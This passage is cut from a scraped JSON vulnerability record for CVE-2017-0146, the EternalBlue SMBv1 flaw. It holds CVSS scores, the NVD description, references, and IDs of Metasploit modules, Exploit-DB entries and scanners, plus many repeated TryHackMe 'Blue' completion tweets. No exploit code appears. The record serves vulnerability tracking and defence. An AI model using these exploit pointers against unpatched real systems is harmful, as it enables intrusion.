Check it out: https://t.co/Obry4AfJD1?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/reason2008/status/1352019208620683266", "text": "Blue - I have just completed this room! Check it out: https://t.co/eudEV3HK2W?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/m3t4ll0rdz/status/1353147857017176069", "text": "Blue - I have just completed this room! Check it out: https://t.co/6r4PlwLHqj?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/CreatureofHabi7/status/1351637620674211841", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/RchZjhOQvw?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}]}}, "extraReferences": [], "hash": "716c3f87807bf2d659427adcb8f28b0e9d53f1f34b7287bbeb4abaef372ce95f", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "cde40a13c5d43ca610b08893c2bdb748", "key": "cvelist"}, {"hash": "d931342d7091edb0db4db482c531ce39", "key": "cpeConfiguration"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "bf11cde0d5ceb8e4aedc6a3dd6d89286", "key": "description"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "26cf6424f2bdd76a83a3a196b3158794", "key": "references"}, {"hash": "90d3da5cc0f990156ba985c80c37d178", "key": "href"}, {"hash": "dd4a1fba31e29c6988f563bdeb65c80c", "key": "affectedConfiguration"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d1b2ee04e6815071fc75b496057c9a52", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0146", "id": "CVE-2017-0146", 
"lastseen": "2020-10-03T13:07:29", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://www.securityfocus.com/bid/96707", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0146", "type": "cve", "viewCount": 42}, "differentElements": ["extraReferences"], "edition": 5, "lastseen": "2020-10-03T13:07:29"}, {"bulletin": {"affectedSoftware": [{"name": "microsoft server_message_block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": [], "cvelist": ["CVE-2017-0146"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": 
"HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0148.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-05T13:14:20", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["SMNTC-96707"], "type": "symantec"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17_010"], "type": "canvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MS:CVE-2017-0146"], "type": "mscve"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-02-05T13:14:20", "rev": 2, "value": 9.5, "vector": "NONE"}}, "hash": "f9f54f2c110b54b5720d5c097976e287d419c3e25dacc91adea32f2181fdcae9", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "cde40a13c5d43ca610b08893c2bdb748", "key": "cvelist"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "bf11cde0d5ceb8e4aedc6a3dd6d89286", "key": "description"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "26cf6424f2bdd76a83a3a196b3158794", "key": "references"}, {"hash": "90d3da5cc0f990156ba985c80c37d178", "key": "href"}, {"hash": 
"d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bcbed719525ad6e957360150b20c3c47", "key": "affectedSoftware"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d1b2ee04e6815071fc75b496057c9a52", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0146", "id": "CVE-2017-0146", "lastseen": "2020-02-05T13:14:20", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://www.securityfocus.com/bid/96707", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0146", "type": "cve", "viewCount": 39}, "differentElements": ["cpe23", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-05T13:14:20"}, {"bulletin": {"affectedSoftware": [{"name": "microsoft server_message_block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": [], "cvelist": ["CVE-2017-0146"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": 
"MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0148.", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-10-04T12:18:44", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": 
["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["SMNTC-96707"], "type": "symantec"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MS17_010"], "type": "canvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["MS:CVE-2017-0146"], "type": "mscve"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-10-04T12:18:44", "value": 9.5, "vector": "NONE"}}, "hash": "f1e22936f8b4db8def8a883b3a60ecea04bb8772cd8c259269d6c29ae23f1de7", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "cde40a13c5d43ca610b08893c2bdb748", 
"key": "cvelist"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "bf11cde0d5ceb8e4aedc6a3dd6d89286", "key": "description"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "90d3da5cc0f990156ba985c80c37d178", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bcbed719525ad6e957360150b20c3c47", "key": "affectedSoftware"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "c5b620836fe37bc62cedfa2b86a05563", "key": "references"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d1b2ee04e6815071fc75b496057c9a52", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0146", "id": "CVE-2017-0146", "lastseen": "2019-10-04T12:18:44", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://www.securityfocus.com/bid/96707", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0146", "type": "cve", "viewCount": 21}, "differentElements": ["references"], "edition": 2, "lastseen": 
"2019-10-04T12:18:44"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "dd4a1fba31e29c6988f563bdeb65c80c"}, {"key": "affectedSoftware", "hash": "e758f8fa39ce9e8de2ffe527ec8b6423"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "a173072793578541ea04b7baa0323592"}, {"key": "cpe23", "hash": "0751f4e56f29adf827144e01a128331d"}, {"key": "cpeConfiguration", "hash": "6ac681e59932d7c840205e984b11bad5"}, {"key": "cvelist", "hash": "cde40a13c5d43ca610b08893c2bdb748"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "cwe", "hash": "226da5129ffaaee3d5b48e506b957d58"}, {"key": "description", "hash": "bf11cde0d5ceb8e4aedc6a3dd6d89286"}, {"key": "extraReferences", "hash": "b8e67c0bcb3b33cda93643b9d21f6fe8"}, {"key": "href", "hash": "90d3da5cc0f990156ba985c80c37d178"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "d68798550042e5272198c20ea65d8f01"}, {"key": "published", "hash": "f54a01beedb777f2ca261ddba30cf1a5"}, {"key": "references", "hash": "26cf6424f2bdd76a83a3a196b3158794"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "d1b2ee04e6815071fc75b496057c9a52"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "2fc4b2321f3a5f242d4224df89b5870212d7472edfecba252d17e70bdefecebe", "viewCount": 103, "enchantments": {"dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", 
"idList": ["SSV:92952", "SSV:92964"]}, {"type": "symantec", "idList": ["SMNTC-96707"]}, {"type": "saint", "idList": ["SAINT:8F97D6443E5FED252FF64CE37A74709D", "SAINT:2D677AA07C3BC24D8037E937830ACA0D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0146"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "canvas", "idList": ["MS17_010"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, 
{"type": "mskb", "idList": ["KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-04-23T00:07:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}], "modified": "2021-04-23T00:07:42"}, "score": {"value": 9.5, "vector": "NONE", "modified": "2021-04-23T00:07:42", "rev": 2}, "twitter": {"counter": 86, "tweets": [{"link": "https://twitter.com/lgzey_/status/1421728043740114946", "text": "Blue - I have just completed this room! Check it out: https://t.co/iW6j8GbVcc?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/RonnyArias/status/1422356892483981314", "text": "Blue - I have just completed this room! Check it out: https://t.co/TJq1bBTWoK?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/QuentinCasares/status/1422521751523762177", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/0l0HtT6bML?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/shadow44406573/status/1423260611429998593", "text": "Blue - I have just completed this room! Check it out: https://t.co/sijYaXhkoQ?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/top_wizard/status/1423289010630270995", "text": "Blue - I have just completed this room! Check it out: https://t.co/1ICOkz0X0h?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/InfoSec_MBE/status/1425558031790657546", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/Tms9b4JF84?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/uk_NJx/status/1426573521308762112", "text": "Blue - I have just completed this room! Check it out: https://t.co/B1WGZBexHA?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/carlos_o_m/status/1426612611009892352", "text": "Blue - I have just completed this room! Check it out: 